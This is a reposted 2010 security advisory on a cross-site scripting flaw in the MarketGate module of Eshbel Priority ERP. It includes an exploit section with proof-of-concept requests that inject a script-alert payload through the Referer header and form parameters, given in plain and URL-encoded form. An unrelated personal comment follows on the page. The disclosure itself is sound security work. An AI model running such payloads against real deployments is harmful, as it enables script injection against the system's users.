Name: Eshbel Priority MarketGate module Cross Site Scripting Vulnerability
Item: Eshbel Priority MarketGate module Cross Site Scripting Vulnerability
Author: Luigi

Home » 2010 » March » 3 » Eshbel Priority MarketGate module Cross Site Scripting Vulnerability

10.25.46 Eshbel Priority MarketGate module Cross Site Scripting Vulnerability
============================== =========== Yaniv Miron aka "Lament" Advisory Feb 27, 2010 Eshbel Priority MarketGate module Cross Site Scripting Vulnerability ========================================= ===================== I. BACKGROUND ===================== Priority’s ERP The features listed below are a selection of some of the functionality available in a selection of the Priority modules. BI (Business Intelligence), Purchasing, BPM (Business Process Management), Manufacturing/Production, GL + Financials, Human Resources, CRM (Customer Relations Management), Project Management, Order Processing, System Administration, Service and Customer Support, SDK (Generators), Inventory Control, User Configuration, WMS http://www.eshbel.com//ERP-Feature.htm ===================== II. DESCRIPTION ===================== A malicious attacker may inject scripts into the Priority’s ERP application using the "Referer" field. ===================== III. ANALYSIS ===================== Exploitation of this vulnerability results in the execution of arbitrary code using a malicious "Referer" field. ===================== IV. EXPLOIT ===================== http://example.com/marketgate/PriHtml.dll/WWWxxxxxxxx Referer: http://example.com/marketgate/priorSysMan.htm WWWxxxxxxxx=>"'><script>alert(31337)</script>&_yyyyyyyy=>"'><script>alert(31337)</script> ------------------------------------------------------------------------------------------------------------------------------------- Referer: http://example.com/marketgate/priorSysMan.htm WWWxxxxxxxx=%3E%22%27%3E%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E&_yyyyyyyy=%3E%22%27%3E% 3Cscript%3Ealert%2831337%29%3C%2Fscript%3E ===================== V. DISCLOSURE TIMELINE ===================== Jan 2009 Vulnerability Found Jan 2009 Vendor Notification Feb 2010 Public Disclosure ===================== VI. CREDIT ===================== Yaniv Miron aka "Lament". lament@ilhack.org
1 2 3 4 5 Views: 9099 \| Added by: b1zz4rd \| Rating: 0.0/0

Total comments: 1

Comments display order:

1 Luigi (18 July 2013 04.10.49)

, "an ordinary life is not good euognh....". Sometimes when I read through your blog I get the sense that you are not content with an ordinary life. That was a bit of an adjustment for me when I got back from Canada but now I love my "ordinary life". I work full time, I teach Zumba a couple days a week, I go to the gym, play on a softball team and spend as much time with my husband as possible when he is not at work (he still works out of town, which is the only part of my life that I don't love). Anyway, I just thought I would share that with you and maybe it will give you something to think about. "Ordinary" isn't so bad!Take Care,Mel

« March 2010 »
Su	Mo	Tu	We	Th	Fr	Sa
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30	31


Name *:
Email *:

Code *:

Login:
Password: